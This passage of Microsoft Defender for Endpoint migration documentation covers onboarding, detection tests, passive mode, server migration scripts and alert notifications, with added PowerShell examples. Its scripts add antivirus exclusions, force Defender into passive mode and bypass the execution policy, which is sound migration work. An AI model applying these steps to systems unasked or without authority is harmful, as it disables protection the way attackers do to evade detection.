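    (Join-Path $env:ProgramData 'ExampleVendor\Logs')
)

foreach ($p in $pathExclusions) {
    Add-MpPreference -ExclusionPath $p
}
foreach ($p in $processExclusions) {
    # Listing the .exe as both a path and a process exclusion excludes the process
    # itself and everything it touches.
    Add-MpPreference -ExclusionPath $p
    Add-MpPreference -ExclusionProcess $p
}

# Verify what is now configured (the merged result of local, Group Policy and MDM settings).
$pref = Get-MpPreference
'Path exclusions:';    $pref.ExclusionPath    | ForEach-Object { "  $_" }
'Process exclusions:'; $pref.ExclusionProcess | ForEach-Object { "  $_" }

# Flag anything that isn't a full path (drive letter or UNC) so that name-only process
# exclusions don't slip through a review.
$pref.ExclusionProcess | Where-Object { $_ -notmatch '^([A-Za-z]:\\|\\\\)' } |
    ForEach-Object { Write-Warning "Name-only process exclusion (weak): $_" }
```

Settings delivered by Group Policy or Intune take precedence over local preferences, so treat this as a way to test and review exclusions rather than as the production mechanism. When the migration is finished, the same entries can be removed with Remove-MpPreference -ExclusionPath and Remove-MpPreference -ExclusionProcess.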

Step 5: Set up your device groups, device collections, and organizational units
Device groups, device collections, and organizational units enable your security team to
manage and assign security policies efficiently and effectively. The following table
describes each of these groups and how to configure them. Your organization might not
use all three collection types.

7 Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.


Device groups (formerly called machine groups) enable your security operations team to configure security capabilities, such as automated investigation and remediation. Device groups are also useful for assigning access to those devices so that your security operations team can take remediation actions if needed. Device groups are created in the Microsoft Defender portal, the same place where alerts such as an "initial access alert," raised when an attack is detected and stopped, appear.

  1. Go to the Microsoft Defender portal (https://security.microsoft.com).
  2. In the navigation pane on the left, choose Settings > Endpoints > Permissions > Device groups.
  3. Choose + Add device group.
  4. Specify a name and description for the device group.
  5. In the Automation level list, select an option. (We recommend Full - remediate threats automatically.) To learn more about the various automation levels, see How threats are remediated.
  6. Specify conditions for a matching rule to determine which devices belong to the device group. For example, you can choose a domain, OS versions, or even use device tags.
  7. On the User access tab, specify roles that should have access to the devices that are included in the device group.
  8. Choose Done.

Device collections enable your security operations team to manage applications, deploy compliance settings, or install software updates on the devices in your organization. Device collections are created by using Configuration Manager.

  Follow the steps in Create a collection.

Organizational units enable you to logically group objects such as user accounts, service accounts, or computer accounts. You can then assign administrators to specific organizational units, and apply group policy to enforce targeted configuration settings. Organizational units are defined in Microsoft Entra Domain Services.

  Follow the steps in Create an Organizational Unit in a Microsoft Entra Domain Services managed domain.

Next step
Congratulations! You've completed the Setup phase of migrating to Defender for
Endpoint!

Proceed to Phase 3: Onboard to Defender for Endpoint


 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Migrate to Microsoft Defender for
Endpoint - Phase 3: Onboard
Article • 10/24/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Phase 1: Prepare | Phase 2: Set up | Phase 3: Onboard (you're here)

Welcome to Phase 3 of migrating to Defender for Endpoint. This migration phase includes the following steps:

1. Onboard devices to Defender for Endpoint.
2. Run a detection test.
3. Confirm that Microsoft Defender Antivirus is in passive mode on your endpoints.
4. Get updates for Microsoft Defender Antivirus.
5. Uninstall your non-Microsoft solution.
6. Make sure Defender for Endpoint is working correctly.

Step 1: Onboard devices to Microsoft Defender for Endpoint

1. Go to the Microsoft Defender portal (https://security.microsoft.com) and sign in.
2. Choose Settings > Endpoints > Onboarding (under Device management).
3. In the Select operating system to start onboarding process list, select an operating system.
4. Under Deployment method, select an option. Follow the links and prompts to onboard your organization's devices. Need help? See Onboarding methods (in this article).

7 Note

If something goes wrong while onboarding, see Troubleshoot Microsoft Defender for Endpoint onboarding issues. That article describes how to resolve onboarding issues and common errors on endpoints.

Onboarding methods
Deployment methods vary, depending on operating system and preferred methods. The
following table lists resources to help you onboard to Defender for Endpoint:

Windows 10 or later
Windows Server 2019 or later
Windows Server, version 1803 or later
Windows Server 2016 or Windows Server 2012 R2 [1]

  Microsoft Intune or Mobile Device Management
  Microsoft Configuration Manager
  Group Policy
  VDI scripts
  Local script (up to 10 devices). The local script method is suitable for a proof of concept but shouldn't be used for production deployment. For a production deployment, we recommend using Group Policy, Microsoft Configuration Manager, or Intune.

Windows Server 2008 R2 SP1

  Microsoft Monitoring Agent (MMA) or Microsoft Defender for Cloud. The Microsoft Monitoring Agent is now the Azure Log Analytics agent. To learn more, see Log Analytics agent overview.

Windows 8.1 Enterprise
Windows 8.1 Pro
Windows 7 SP1 Pro
Windows 7 SP1

  Microsoft Monitoring Agent (MMA). The Microsoft Monitoring Agent is now the Azure Log Analytics agent. To learn more, see Log Analytics agent overview.

Windows servers
Linux servers

  Integration with Microsoft Defender for Cloud

macOS

  Local script
  Microsoft Intune
  JAMF Pro
  Mobile Device Management

Linux Server

  Local script
  Puppet
  Ansible
  Chef

Android

  Microsoft Intune

iOS

  Microsoft Intune
  Mobile Application Manager

[1] Windows Server 2016 and Windows Server 2012 R2 must be onboarded using the instructions in Onboard Windows servers.

) Important

The standalone versions of Defender for Endpoint Plan 1 and Plan 2 do not include
server licenses. To onboard servers, you'll need an additional license, such as
Microsoft Defender for Servers Plan 1 or Plan 2. To learn more, see Defender for
Endpoint onboarding Windows Server.

Step 2: Run a detection test

To verify that your onboarded devices are properly connected to Defender for Endpoint, you can run a detection test.

Windows 10 or later
Windows Server 2022
Windows Server 2019
Windows Server, version 1803, or later
Windows Server 2016
Windows Server 2012 R2

  See Run a detection test.

macOS (see System requirements)

  Download and use the DIY app at https://aka.ms/mdatpmacosdiy. For more information, see Defender for Endpoint on macOS.

Linux (see System requirements)

  1. Run the following command, and look for a result of 1: mdatp health --field real_time_protection_enabled
  2. Open a Terminal window, and run the following command: curl -o ~/Downloads/eicar.com.txt https://www.eicar.org/download/eicar.com.txt
  3. Run the following command to list any detected threats: mdatp threat list

  For more information, see Defender for Endpoint on Linux.
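Added example, not from the original article: before running the detection test on a Windows device, it's worth confirming locally that the sensor is installed, running, and reports as onboarded. A test file dropped on a device whose sensor never connected produces no alert and is easy to misread as a detection failure. The function below reads the Sense service state and the sensor's Status registry key; the Status key and its OnboardingState value are the ones the onboarding troubleshooting guidance points at, and OrgId is read only if present.

```powershell
# Added example (not from the original article): check that the Defender for Endpoint
# sensor on a Windows device is installed, running and reports as onboarded before you
# run the detection test. Returns a summary object; exits non-zero if a check fails.
# Run in an elevated PowerShell session.

function Test-MdeOnboarding {
    $result = [ordered]@{
        SenseServiceStatus = 'Missing'
        SenseStartType     = $null
        OnboardingState    = $null
        OrgId              = $null
        Healthy            = $false
    }

    # The EDR sensor runs as the 'Sense' service (Windows Defender Advanced Threat Protection).
    $svc = Get-Service -Name Sense -ErrorAction SilentlyContinue
    if ($svc) {
        $result.SenseServiceStatus = $svc.Status.ToString()
        $result.SenseStartType     = $svc.StartType.ToString()
    }

    # After a successful onboarding the sensor records OnboardingState = 1 (and the tenant's
    # OrgId) under this Status key. A missing key means the onboarding package never ran.
    $statusKey = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'
    if (Test-Path $statusKey) {
        $status = Get-ItemProperty -Path $statusKey
        $result.OnboardingState = $status.OnboardingState
        $result.OrgId           = $status.OrgId
    }

    $result.Healthy = ($result.SenseServiceStatus -eq 'Running') -and ($result.OnboardingState -eq 1)
    [pscustomobject]$result
}

$check = Test-MdeOnboarding
$check | Format-List

if (-not $check.Healthy) {
    Write-Warning 'Sensor is not running or not onboarded; fix this before running the detection test.'
    exit 1
}
'Sensor is healthy; proceed with the detection test from the portal''s onboarding page.'
```

Healthy reported as False with no Status key usually means the onboarding package was never run on the device. A Running service with OnboardingState 1 but no corresponding device in the portal points at connectivity instead (proxy configuration or the service URLs not being allowed out).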

Step 3: Confirm that Microsoft Defender Antivirus is in passive mode on your endpoints

Now that your endpoints have been onboarded to Defender for Endpoint, your next step is to make sure Microsoft Defender Antivirus is running in passive mode by using PowerShell.

1. On a Windows device, open Windows PowerShell as an administrator.
2. Run the following PowerShell cmdlet: Get-MpComputerStatus | Select-Object AMRunningMode
3. Review the results. You should see Passive mode.

7 Note
To learn more about passive mode and active mode, see More details about
Microsoft Defender Antivirus states.

Set Microsoft Defender Antivirus on Windows Server to passive mode manually

To set Microsoft Defender Antivirus to passive mode on Windows Server, version 1803 or newer, Windows Server 2019, or Windows Server 2022, follow these steps:

1. Open Registry Editor, and then navigate to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection.
2. Edit (or create) a DWORD entry called ForceDefenderPassiveMode, and specify the following settings:
   - Set the DWORD's value to 1.
   - Under Base, select Hexadecimal.

7 Note

You can use other methods to set the registry key, such as the following:

- Group Policy Preference
- Local Group Policy Object tool
- A package in Configuration Manager

Start Microsoft Defender Antivirus on Windows Server 2016

If you're using Windows Server 2016, you might have to start Microsoft Defender Antivirus manually. You can do this by running the Defender Antivirus command-line utility from an elevated prompt on the device: "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -wdenable. (MpCmdRun.exe is a command-line tool, not a PowerShell cmdlet, so it works from Command Prompt as well as from PowerShell.)
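Added example (not from the original article) that strings together the checks and the registry change described in Step 3, including the Windows Server 2016 case: read the current AMRunningMode, enable the Defender Antivirus engine on Server 2016 if it isn't running, set ForceDefenderPassiveMode, and re-check. The registry path and value are the ones the article gives; the MpCmdRun.exe location under %ProgramFiles%\Windows Defender is the utility's standard install path.

```powershell
# Added example (not from the original article): force Microsoft Defender Antivirus into
# passive mode on Windows Server while a non-Microsoft antivirus product remains primary,
# then verify the resulting state. Run in an elevated PowerShell session.

$key  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
$name = 'ForceDefenderPassiveMode'

function Get-DefenderRunningMode {
    # AMRunningMode reports values such as 'Normal', 'Passive Mode', 'EDR Block Mode',
    # 'SxS Passive Mode' or 'Not running'.
    (Get-MpComputerStatus).AMRunningMode
}

function Set-DefenderPassiveMode {
    param([ValidateSet(0, 1)][int]$Enabled = 1)
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    # REG_DWORD 1 = force passive mode; 0 = hand control back to Defender Antivirus.
    New-ItemProperty -Path $key -Name $name -Value $Enabled -PropertyType DWord -Force | Out-Null
}

# On Windows Server 2016 the antivirus engine may have to be switched on first
# (MpCmdRun.exe is a command-line tool, so it's invoked with the call operator).
$os = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
$wd = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
if ($os -match 'Server 2016' -and ($null -eq $wd -or $wd.Status -ne 'Running')) {
    & "$env:ProgramFiles\Windows Defender\MpCmdRun.exe" -wdenable
}

"Before: $(Get-DefenderRunningMode)"
Set-DefenderPassiveMode -Enabled 1
Start-Sleep -Seconds 5
$mode = Get-DefenderRunningMode
"After:  $mode"

if ($mode -notmatch 'Passive') {
    Write-Warning "Expected passive mode but AMRunningMode is '$mode'. Confirm the device is onboarded to Defender for Endpoint and check again after a restart."
}
```

The key only has an effect on devices that are onboarded to Defender for Endpoint, so if AMRunningMode still reports Normal afterwards, confirm onboarding first; a restart may be needed before the new mode is reported. To return control to Defender Antivirus after the non-Microsoft product is removed, call Set-DefenderPassiveMode -Enabled 0 (or delete the value).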

Step 4: Get updates for Microsoft Defender Antivirus

Keeping Microsoft Defender Antivirus up to date is critical to assure your devices have
the latest technology and features needed to protect against new malware and attack
techniques, even if Microsoft Defender Antivirus is running in passive mode. (See
Microsoft Defender Antivirus compatibility.)

There are two types of updates related to keeping Microsoft Defender Antivirus up to
date:

Security intelligence updates

Product updates

To get your updates, follow the guidance in Manage Microsoft Defender Antivirus
updates and apply baselines.

Step 5: Uninstall your non-Microsoft solution

If, at this point, you've onboarded your organization's devices to Defender for Endpoint, and Microsoft Defender Antivirus is installed and enabled, then your next step is to uninstall your non-Microsoft antivirus, antimalware, and endpoint protection solution. When you uninstall your non-Microsoft solution, Microsoft Defender Antivirus changes from passive mode to active mode. In most cases, this happens automatically.

) Important

If, for some reason, Microsoft Defender Antivirus does not go into active mode
after you have uninstalled your non-Microsoft antivirus/antimalware solution, see
Microsoft Defender Antivirus seems to be stuck in passive mode.

To get help with uninstalling your non-Microsoft solution, contact their technical
support team.

Step 6: Make sure Defender for Endpoint is working correctly

Now that you've onboarded to Defender for Endpoint and uninstalled your former non-Microsoft solution, your next step is to make sure that Defender for Endpoint is working correctly.

1. Go to the Microsoft Defender portal (https://security.microsoft.com ) and sign in.

2. In the navigation pane, choose Endpoints > Device inventory. There, you're able
to see protection status for devices.
To learn more, see Device inventory.

Next step
Congratulations! You have completed your migration to Defender for Endpoint!

Configure your Defender for Endpoint settings.


Server migration scenarios from the
previous, MMA-based Microsoft
Defender for Endpoint solution
Article • 11/15/2023

Applies to:

Windows Server 2012 R2
Windows Server 2016
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

7 Note

Always ensure the operating system, and Microsoft Defender Antivirus on Windows
Server 2016, are fully updated before proceeding with installation or upgrade. To
receive regular product improvements and fixes for the EDR Sensor component,
ensure Windows Update KB5005292 gets applied or approved after installation.
In addition, to keep protection components updated, please reference Manage
Microsoft Defender Antivirus updates and apply baselines.

These instructions apply to the new unified solution and installer (MSI) package of
Microsoft Defender for Endpoint for Windows Server 2012 R2 and Windows Server
2016. This article contains high-level instructions for various possible migration
scenarios from the previous to the current solution. These high-level steps are intended
as guidelines to be adjusted to the deployment and configuration tools available in your
environment.

If you are using Microsoft Defender for Cloud to perform deployment, you can
automate installation and upgrade. See Defender for Servers Plan 2 now integrates
with MDE unified solution

7 Note

Operating system upgrades with Microsoft Defender for Endpoint installed are not
supported. Please offboard and uninstall, upgrade the operating system, then
proceed with installation.
Installer script

7 Note

Make sure the machines you run the script on aren't blocking its execution. The recommended execution policy setting for PowerShell is AllSigned. This requires importing the script's signing certificate into the Local Computer Trusted Publishers store if the script runs as SYSTEM on the endpoint (for example, from Configuration Manager), because there's no interactive user to accept the publisher prompt.

To facilitate upgrades when Microsoft Endpoint Configuration Manager is not yet available or updated to perform the automated upgrade, you can use this upgrade script. Download it by selecting the "Code" button and downloading the .zip file, then extracting install.ps1. It can help automate the following required steps:

1. Remove the OMS workspace for Microsoft Defender for Endpoint (OPTIONAL).
2. Remove the System Center Endpoint Protection (SCEP) client if installed.
3. Download and install prerequisites if required.
4. Enable and update the Defender Antivirus feature on Windows Server 2016.
5. Install Microsoft Defender for Endpoint.
6. Apply the onboarding script for use with Group Policy downloaded from Microsoft Defender XDR.

To use the script, download it to an installation directory where you have also placed the installation and onboarding packages (see Configure server endpoints).

Example:

PowerShell

.\install.ps1 -RemoveMMA <YOUR_WORKSPACE_ID> -OnboardingScript ".\WindowsDefenderATPOnboardingScript.cmd"

For more information on how to use the script, run Get-Help .\install.ps1 in PowerShell.
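Added example (not from the original article) for the note above: verify the Authenticode signature on install.ps1, compare the signer's thumbprint with a value you recorded from a trusted copy, and add the signer to the Local Computer Trusted Publishers store so the script runs under AllSigned without the interactive publisher prompt, which isn't available when Configuration Manager runs the script as SYSTEM. The script path and the thumbprint placeholder are assumptions; the certificate that gets imported is whatever actually signed the file you downloaded.

```powershell
# Added example (not from the original article): prepare a server to run the signed
# install.ps1 under the AllSigned execution policy. $scriptPath and $expectedThumbprint
# are assumptions. Run in an elevated PowerShell session.

$scriptPath = 'C:\MDE\install.ps1'   # assumption: where install.ps1 sits next to the installer and onboarding package

# 1. Refuse to continue if the script is unsigned, altered since signing, or signed by an
#    untrusted chain. Status is 'Valid' only when the hash matches and the chain is trusted.
$sig = Get-AuthenticodeSignature -FilePath $scriptPath
if ($sig.Status -ne 'Valid') {
    throw "Signature check failed for ${scriptPath}: $($sig.Status) - $($sig.StatusMessage)"
}
"Signed by:  $($sig.SignerCertificate.Subject)"
"Thumbprint: $($sig.SignerCertificate.Thumbprint)"

# 2. Pin the signer: compare with the thumbprint you recorded from a trusted copy
#    (assumption: you keep that value out-of-band, e.g. in your change record).
$expectedThumbprint = '<THUMBPRINT_OF_TRUSTED_COPY>'
if ($expectedThumbprint -notlike '<*>' -and $sig.SignerCertificate.Thumbprint -ne $expectedThumbprint) {
    throw 'Signer thumbprint does not match the expected value; do not run this script.'
}

# 3. Add the signer to LocalMachine\TrustedPublisher so AllSigned doesn't prompt. Without
#    this, a run as SYSTEM (no interactive user) simply fails instead of prompting.
$store = New-Object System.Security.Cryptography.X509Certificates.X509Store('TrustedPublisher', 'LocalMachine')
$store.Open('ReadWrite')
try {
    $already = $store.Certificates | Where-Object { $_.Thumbprint -eq $sig.SignerCertificate.Thumbprint }
    if (-not $already) {
        $store.Add($sig.SignerCertificate)
        'Signer added to LocalMachine\TrustedPublisher.'
    } else {
        'Signer already trusted.'
    }
} finally {
    $store.Close()
}

# 4. Enforce AllSigned for the machine scope and show the effective policy
#    (a Group Policy-managed execution policy overrides this and produces a warning).
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force
"Effective execution policy: $(Get-ExecutionPolicy)"
```

Execution policy is a safeguard against accidentally running unsigned scripts, not a security boundary; the value in this step is the signature and thumbprint check, which establishes that the copy you're about to run on every server is the one you downloaded and reviewed.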

Microsoft Endpoint Configuration Manager migration scenarios

7 Note

You'll need Microsoft Endpoint Configuration Manager, version 2107 or later, to perform Endpoint Protection policy configuration. From version 2207 or later, deployment and upgrades can be fully automated. For instructions on how to migrate using Microsoft Endpoint Configuration Manager older than version 2207, see Migrating servers from Microsoft Monitoring Agent to the unified solution.

If you are running a non-Microsoft antivirus solution

1. Fully update the machine, including Microsoft Defender Antivirus (Windows Server 2016), ensuring prerequisites have been met. For more information on the prerequisites that have to be met, see Prerequisites for Windows Server 2016.
2. Ensure third-party antivirus management no longer pushes antivirus agents to these machines.*
3. Author your policies for the protection capabilities in Microsoft Defender for Endpoint and target those to the machine in the tool of your choice.
4. Install the Microsoft Defender for Endpoint for Windows Server 2012 R2 and 2016 package and enable passive mode. See Install Microsoft Defender Antivirus using command line.
   a. Apply the onboarding script for use with Group Policy downloaded from Microsoft Defender XDR.
5. Apply updates.
6. Remove your non-Microsoft antivirus software by either using the non-Microsoft antivirus console or by using Microsoft Endpoint Configuration Manager, as appropriate. Make sure to remove the passive mode configuration.*

 Tip

You can use the installer script (see Installer script, earlier in this article) as part of your application to automate the above steps. To enable passive mode, apply the -Passive flag. For example:

PowerShell

.\install.ps1 -RemoveMMA <YOUR_WORKSPACE_ID> -OnboardingScript ".\WindowsDefenderATPOnboardingScript.cmd" -Passive

*These steps only apply if you intend to replace your non-Microsoft antivirus solution. See Better together: Microsoft Defender Antivirus and Microsoft Defender for Endpoint.

To move a machine out of passive mode, set the following key to 0:

Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: ForceDefenderPassiveMode
Type: REG_DWORD
Value: 0
If you are running System Center Endpoint Protection but are not managing the machine using Microsoft Endpoint Configuration Manager (MECM/ConfigMgr)

1. Fully update the machine, including Microsoft Defender Antivirus (Windows Server 2016), ensuring prerequisites have been met.
2. Create and apply policies using Group Policy, PowerShell, or a third-party management solution.
3. Uninstall System Center Endpoint Protection (Windows Server 2012 R2).
4. Install Microsoft Defender for Endpoint (see Configure server endpoints).
5. Apply the onboarding script for use with Group Policy downloaded from Microsoft Defender XDR.
6. Apply updates.

 Tip

You can use the installer script to automate the above steps.

Microsoft Defender for Cloud scenarios

You're using Microsoft Defender for Cloud. The Microsoft Monitoring Agent (MMA) and/or Microsoft Antimalware for Azure (SCEP) are installed and you want to upgrade.

If you're using Microsoft Defender for Cloud, you can use the automated upgrade process. See Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft Defender for Endpoint.

Group Policy configuration

For configuration using Group Policy, ensure you're using the latest ADMX files in your central store to access the correct Defender for Endpoint policy options. See How to create and manage the Central Store for Group Policy Administrative
Templates in Windows and download the latest files for use with Windows 10.


Migrating servers from Microsoft
Monitoring Agent to the unified
solution
Article • 11/15/2023

Applies to:

Windows Server 2012 R2
Windows Server 2016

This article guides you in migrating down-level servers from Microsoft Monitoring Agent
(MMA) to the unified solution.

Prerequisites
Microsoft Endpoint Configuration Manager (MECM) higher than 2207.
Down-level OS devices in your environment onboarded with Microsoft Monitoring
Agent. To confirm, verify that MsSenseS.exe is running in Task Manager.
Presence of the MMA agent. You can verify it by checking if the correct Workspace
ID is present in the Control Panel> Microsoft Monitoring Agent.
Active Microsoft Defender portal with devices onboarded.
A Device Collection containing down-level servers such as Windows Server 2012
R2 or Windows Server 2016 using MMA agent is set up in your MECM instance.

For more information on installing the listed prerequisites, see related topics section.

Gather required files

Copy the unified solution package, onboarding script and migration script to the same content source you deploy other apps with MECM.

1. Download the onboarding script and the unified solution from the Microsoft Defender XDR settings page.

   7 Note

   You must select Group Policy from the Deployment method dropdown to obtain the .cmd file.

2. Download the migration script from the document: Server migration scenarios from the previous, MMA-based Microsoft Defender for Endpoint solution. This script can also be found on GitHub: GitHub - microsoft/mdefordownlevelserver.

3. Save all three files in a shared folder used by MECM as a Software Source.

Create the package as an application

1. In the MECM console, go to Software Library > Applications > Create Application.
2. Select Manually specify the application information.
3. Select Next on the Software Center screen of the wizard.
4. On the Deployment Types page, click Add.
5. Select Manually specify the deployment type information and select Next.
6. Give a name to your script deployment and select Next.
7. On this step, copy the UNC path where your content is located. Example: \\ServerName\h$\SOFTWARE_SOURCE\path
8. Additionally, set the following as the installation program, substituting your own Workspace ID:

   PowerShell

   Powershell.exe -ExecutionPolicy ByPass -File install.ps1 -RemoveMMA <workspace ID> -OnboardingScript .\WindowsDefenderATPOnboardingScript.cmd

   Click Next. Note that -ExecutionPolicy ByPass overrides the AllSigned setting recommended for this script; it avoids the publisher prompt when the program runs as SYSTEM, but if your environment requires signed scripts, use AllSigned here and import the script's signing certificate into the Local Computer Trusted Publishers store instead.

9. Click Next and click Add Clause.
10. The detection method is based on the registry key shown below.

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense

    Check the option: This registry setting must exist on the target system to indicate presence of this application.

     Tip

    The registry key value was obtained by running the PowerShell command shown below on a device that has the unified solution installed. Other creative methods of detection can also be used. The goal is to identify whether the unified solution has already been installed on a specific device. You can leave the Value and Data Type fields blank.

    PowerShell

    Get-WmiObject Win32_Product | Sort-Object -Property Name | Format-Table IdentifyingNumber, Name, LocalPackage -AutoSize

    Be aware that enumerating Win32_Product makes Windows Installer run a consistency check, and possibly a repair, of every MSI package on the device. It's slow and has side effects, so run it on a test device only, and don't use it as the detection method itself.

11. In the User Experience section, check the recommended settings. You can choose what suits your environment, and then click Next. For Installation program visibility, it's advisable to install with Normal during phase testing, then change it to Minimized for general deployment.

     Tip

    The maximum allowed runtime can be lowered from the default of 120 minutes to 60 minutes.

12. Add any additional requirements, then select Next.
13. Under the Dependencies section, select Next.
14. Select Next until the completion screen comes up, then Close.
15. Keep selecting Next until the Application Wizard completes. Verify that every step shows a green check mark.
16. Close the wizard, right-click the newly created application, and deploy it to your down-level server collection. Locally, the installation can be confirmed in Software Center. For details, check the CM logs at C:\Windows\CCM\Logs\AppEnforce.log.
17. Verify the status of the migration at MECM > Monitoring > Deployments.
18. Troubleshooting .ETL files are created and automatically saved locally on each server at C:\Windows\ccmcache\#\. These files can be used by support to troubleshoot onboarding issues.
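As an added example (not from the original article), the registry-key detection rule from steps 9 and 10 can be expressed as a PowerShell detection script instead, which lets it check more than the bare presence of the key. Configuration Manager treats any text written to standard output with exit code 0 as "installed" and no output as "not installed". Beyond the Sense service key the article uses, the script confirms that the key's ImagePath points at an MsSense.exe that actually exists, so a stale key left behind by a failed uninstall isn't reported as a working install. The product DisplayName pattern in Get-InstalledProduct is an assumption.

```powershell
# Added example (not from the original article): a Configuration Manager PowerShell
# detection method for the unified Defender for Endpoint package. Runs as SYSTEM on the
# target device; output = detected, no output = not detected.

$senseKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\Sense'

function Test-UnifiedSolutionInstalled {
    if (-not (Test-Path $senseKey)) { return $false }

    $imagePath = (Get-ItemProperty -Path $senseKey -ErrorAction SilentlyContinue).ImagePath
    if (-not $imagePath) { return $false }

    # ImagePath is normally quoted ("C:\...\MsSense.exe"); strip the quotes and any arguments.
    $exe = if ($imagePath -match '^"([^"]+)"') { $Matches[1] } else { ($imagePath -split ' ')[0] }

    # The unified solution runs MsSense.exe as the Sense service; the MMA-based sensor ran
    # MsSenseS.exe under the Monitoring Agent and had no Sense service at all.
    return ([System.IO.Path]::GetFileName($exe) -ieq 'MsSense.exe') -and (Test-Path -LiteralPath $exe)
}

# For the interactive "which package is installed" question, read the Uninstall keys instead
# of Win32_Product: Win32_Product triggers a Windows Installer consistency check (and possible
# repair) of every MSI package on the device.
function Get-InstalledProduct {
    param([string]$NameLike = 'Microsoft Defender for Endpoint*')   # assumption: package DisplayName
    $roots = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
             'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall'
    Get-ChildItem -Path $roots -ErrorAction SilentlyContinue |
        ForEach-Object { Get-ItemProperty -Path $_.PSPath } |
        Where-Object { $_.DisplayName -like $NameLike } |
        Select-Object DisplayName, DisplayVersion, PSChildName
}

if (Test-UnifiedSolutionInstalled) {
    # Any output means "detected"; keep it to a single line.
    'Installed'
}
```

Paste the script into the detection method's script editor (script type: PowerShell) in place of the registry clause. Get-InstalledProduct isn't part of the detection path; call it interactively on a test device when you want the product code (PSChildName) without the side effects of Win32_Product.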
Related topics
Microsoft Monitoring Agent Setup
Deploy applications - Configuration Manager
Microsoft Defender for Endpoint - Configuration Manager
Onboard Windows servers to the Microsoft Defender for Endpoint service
Microsoft Defender for Endpoint: Defending Windows Server 2012 R2 and 2016


Configure general Defender for
Endpoint settings
Article • 01/19/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Use the Settings > Endpoints menu to modify general settings, advanced features,
enable the preview experience, email notifications, and the custom threat intelligence
feature.

In this section

General settings: Modify your general settings that were previously defined as part of the onboarding process.
Permissions: Manage portal access using RBAC as well as device groups.
APIs: Enable the threat intel and SIEM integration.
Rules: Configure suppression rules and automation settings.
Device management: Onboard and offboard devices.
Network assessments: Choose devices to be scanned regularly and added to the device inventory.


Configure alert notifications in
Microsoft Defender XDR
Article • 07/13/2023

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

You can configure Microsoft Defender XDR to send email notifications to specified
recipients for new alerts. This feature enables you to identify a group of individuals who
will immediately be informed and can act on alerts based on their severity.

If you're using Defender for Business, you can set up email notifications for specific
users (not roles or groups).

7 Note

- Only users with 'Manage security settings' permissions can configure email notifications. If you've chosen to use basic permissions management, users with Security Administrator or Global Administrator roles can configure email notifications.
- Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

You can set the alert severity levels that trigger notifications. You can also add or remove
recipients of the email notification. New recipients get notified about alerts triggered
after they're added. For more information about alerts, see View and organize the Alerts
queue.

If you're using role-based access control (RBAC), recipients will only receive notifications
based on the device groups that were configured in the notification rule. Users with the
proper permission can only create, edit, or delete notifications that are limited to their
device group management scope. Only users assigned to the Global administrator role
can manage notification rules that are configured for all device groups.

The email notification includes basic information about the alert and a link to the portal
where you can do further investigation.
Create rules for alert notifications
You can create rules that determine the devices and alert severities to send email
notifications for and the notification recipients.

1. Go to Microsoft Defender XDR and sign in using an account with the Security
administrator or Global administrator role assigned.

2. In the navigation pane, select Settings > Endpoints > General > Email
notifications.

3. Click Add item.

4. Specify the General information:

Rule name - Specify a name for the notification rule.

Include organization name - Specify the customer name that appears on the
email notification.

Include tenant-specific portal link - Adds a link with the tenant ID to allow
access to a specific tenant.

Include device information - Includes the device name in the email alert
body.

7 Note

This information might be processed by recipient mail servers that are


not in the geographic location you have selected for your Defender data.

Devices - Choose whether to notify recipients for alerts on all devices (Global
administrator role only) or on selected device groups. For more information,
see Create and manage device groups. (If you're using Defender for Business,
device groups do not apply.)

Alert severity - Choose the alert severity level.

5. Click Next.

6. Enter the recipient's email address then click Add recipient. You can add multiple
email addresses.

7. Check that email recipients can receive the email notifications by selecting Send
test email.
8. Click Save notification rule.

Edit a notification rule


1. Select the notification rule you'd like to edit.

2. Update the General and Recipient tab information.

3. Click Save notification rule.

Delete notification rule


1. Select the notification rule you'd like to delete.

2. Click Delete.

Troubleshoot email notifications for alerts


This section lists various issues that you may encounter when using email notifications
for alerts.

Problem: Intended recipients report they're not getting the notifications.

Solution: Make sure that the notifications aren't blocked by email filters:

1. Check that the email notifications aren't sent to the Junk Email folder. Mark them
as Not junk.
2. Check that your email security product isn't blocking the email notifications.
3. Check your email application rules that might be catching and moving your email
notifications.

Related topics
Update data retention settings
Configure advanced features
Configure vulnerability email notifications


Configure vulnerability email notifications in Microsoft Defender for Endpoint
Article • 07/18/2023

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Want to experience Defender for Endpoint? Sign up for a free trial.

Configure Microsoft Defender for Endpoint to send email notifications to specified
recipients for new vulnerability events. This feature enables you to identify a group of
individuals who will immediately be informed and can act on the notifications based on
the event. The vulnerability information comes from Microsoft Defender Vulnerability
Management.

If you're using Defender for Business, you can set up vulnerability notifications for
specific users (not roles or groups).

Note

Only users with 'Manage security settings' permissions can configure email
notifications. If you've chosen to use basic permissions management, users
with Security Administrator or Global Administrator roles can configure email
notifications. Learn more about permission options.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

